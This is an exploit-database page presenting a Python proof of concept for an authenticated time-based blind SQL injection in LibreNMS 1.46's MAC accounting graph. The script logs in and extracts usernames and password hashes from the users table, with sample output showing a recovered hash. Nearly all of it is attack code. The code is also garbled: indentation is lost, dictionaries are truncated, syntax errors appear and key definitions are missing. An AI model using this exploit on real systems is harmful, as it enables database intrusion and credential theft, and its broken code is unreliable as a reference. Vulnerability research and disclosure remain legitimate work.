Exploits / Vulnerability Discovered : 2020-12-14 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Librenms 1.46 mac accounting graph authenticated sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection
# Google Dork: Unknown
# Date: 13-12-2020
# Exploit Author: Hodorsec
# Vendor Homepage: https://www.librenms.org
# Software Link: https://github.com/librenms/librenms
# Update notice: https://community.librenms.org/t/v1-69-october-2020-info/13838
# Version: 1.46
# Tested on: Debian 10, PHP 7, LibreNMS 1.46; although newer version might be affected until 1.69 patch
# CVE : N/A
# $ python3 poc_librenms-1.46_auth_sqli_timed.py librenms D32fwefwef 2
# [*] Checking if authentication for page is required...
# [*] Visiting page to retrieve initial token and cookies...
# [*] Retrieving authenticated cookie...
# [*] Printing number of rows in table...
# 1
# [*] Found 1 rows of data in table 'users'
# [*] Retrieving 1 rows of data using 'username' as column and 'users' as table...
# [*] Extracting strings from row 1...
# librenms
# [*] Retrieved value 'librenKs' for column 'username' in row 1
# [*] Retrieving 1 rows of data using 'password' as column and 'users' as table...
# [*] Extracting strings from row 1...
# $2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr
# [*] Retrieved value '$2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr' for column 'password' in row 1
# [+] Done!
import requests
import urllib3
import os
import sys
import re
from bs4 import BeautifulSoup
def check_auth(url,headers):
print("[*] Checking if authentication for page is required...")
target = url + "/graph.php"
r = requests.get(target,headers=headers,timeout=timeout,verify=False)
if "Unauthorized" in r.text:
return True
return False
def get_initial_token_and_cookies(url,headers):
print("[*] Visiting page to retrieve initial token and cookies...")
target = url + "/login"
r = requests.get(target,headers=headers,timeout=timeout,verify=False)
soup = BeautifulSoup(r.text,'html.parser')
for n in soup('input'):
if n['name'] == "_token":
token = n['value']
return token,r.cookies
return None,r.cookies
def get_valid_cookie(url,headers,token,cookies,usern,passw):
print("[*] Retrieving authenticated cookie...")
appl_cookie = "laravel_session"
post_data = {'_token':token,
target = url + "/login"
r = requests.post(target,data=post_data,headers=headers,cookies=cookies,timeout=timeout,verify=False)
res = r.text
if "Overview | LibreNMS" in res:
return r.cookies
print("[!] No valid response from used session, exiting!\n")
# Perform the SQLi call for injection
def sqli(url,headers,cookies,inj_str,sleep):
comment_inj_str = re.sub(" ","/**/",inj_str)
inj_params = {'id':'1',
inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_params.items())
# Do GET request
r = requests.get(url,params=inj_params_unencoded,headers=headers,cookies=cookies,timeout=timeout,verify=False)
res = r.elapsed.total_seconds()
if res >= sleep:
return True
elif res < sleep:
return False
print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
# Extract rows
def get_rows(url,headers,cookies,table,sleep):
rows = ""
max_pos_rows = 4
# Get number maximum positional characters of rows: e.g. 1096,2122,1234,etc.
for pos in range(1,max_pos_rows+1):
# Test if current pos does have any valid value. If not, break
direction = ">"
inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))" + direction + "1,0," + str(sleep) + inj_suffix
if not sqli(url,headers,cookies,inj_str,sleep):
# Loop decimals
direction = "="
for num_rows in range(dec_begin,dec_end+1):
row_char = chr(num_rows)
inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))"=+ direction + str(num_rows) + ",0," + str(sleep) + inj_suffix
if sqli(url,headers,cookies,inj_str,sleep):
rows += row_char
if rows != "":
print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n")
return int(rows)
return False
# Loop through positions and characters
def get_data(url,headers,cookies,row,column,table,sleep):
extracted = ""
max_pos_len = 50
# Loop through length of string
# Not very efficient, should use a guessing algorithm
print("[*] Extracting strings from row " + str(row+1) + "...")
for pos in range(1,max_pos_len):
# Test if current pos does have any valid value. If not, break
direction = ">"
inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) += ",1)," + str(pos) + ",1))" + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix
if not sqli(url,headers,cookies,inj_str,sleep):
# Loop through ASCII printable characters
direction = "="
for guess in range(ascii_begin,ascii_end+1):
extracted_char = chr(guess)
inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix
if sqli(url,headers,cookies,inj_str,sleep):
extracted += chr(guess)
return extracted
# Do stuff
# Get a valid initial token and cookies
token,cookies = get_initial_token_and_cookies(url,headers)
# Check if authentication is required
auth_required = check_auth(url,headers)
if auth_required:
# Get an authenticated session cookie using credentials
valid_cookies = get_valid_cookie(url,headers,token,cookies,usern,passw)
valid_cookies = cookies
print("[+] Authentication not required, continue without authentication...")
# The columns to retrieve
columns = ['username','password']
# The table to retrieve data from
table = "users"
# Getting rows
print("[*] Printing number of rows in table...")
rows = get_rows(url,headers,valid_cookies,table,sleep)
if not rows:
print("[!] Unable to retrieve rows, checks requests.\n")
# Getting values for found rows in specified columns
for column in columns:
print("[*] Retrieving " + str(rows) + " rows of data using '" + column + "' as column and '" + table + "' as table...")
for row in range(0,rows):
# rowval_len = get_length(url,headers,row,column,table)
retrieved = get_data(url,headers,valid_cookies,row,column,table,sleep)
print("\n[*] Retrieved value '" + retrieved + "' for column'" + column + "' in row " + str(row+1))
# Done
print("\n[+] Done!\n")
except requests.exceptions.Timeout:
print("[!] Timeout error\n")
except requests.exceptions.TooManyRedirects:
print("[!] Too many redirects\n")
except requests.exceptions.ConnectionError:
print("[!] Not able to connect to URL\n")
except requests.exceptions.RequestException as e:
print("[!] " + str(e))
except requests.exceptions.HTTPError as e:
print("[!] Failed with error code - " + str(e.code) + "\n")
except KeyboardInterrupt:
# If we were called as a program, go execute the main function.
if __name__ == "__main__":
Librenms 1.46 mac accounting graph authenticated sql injection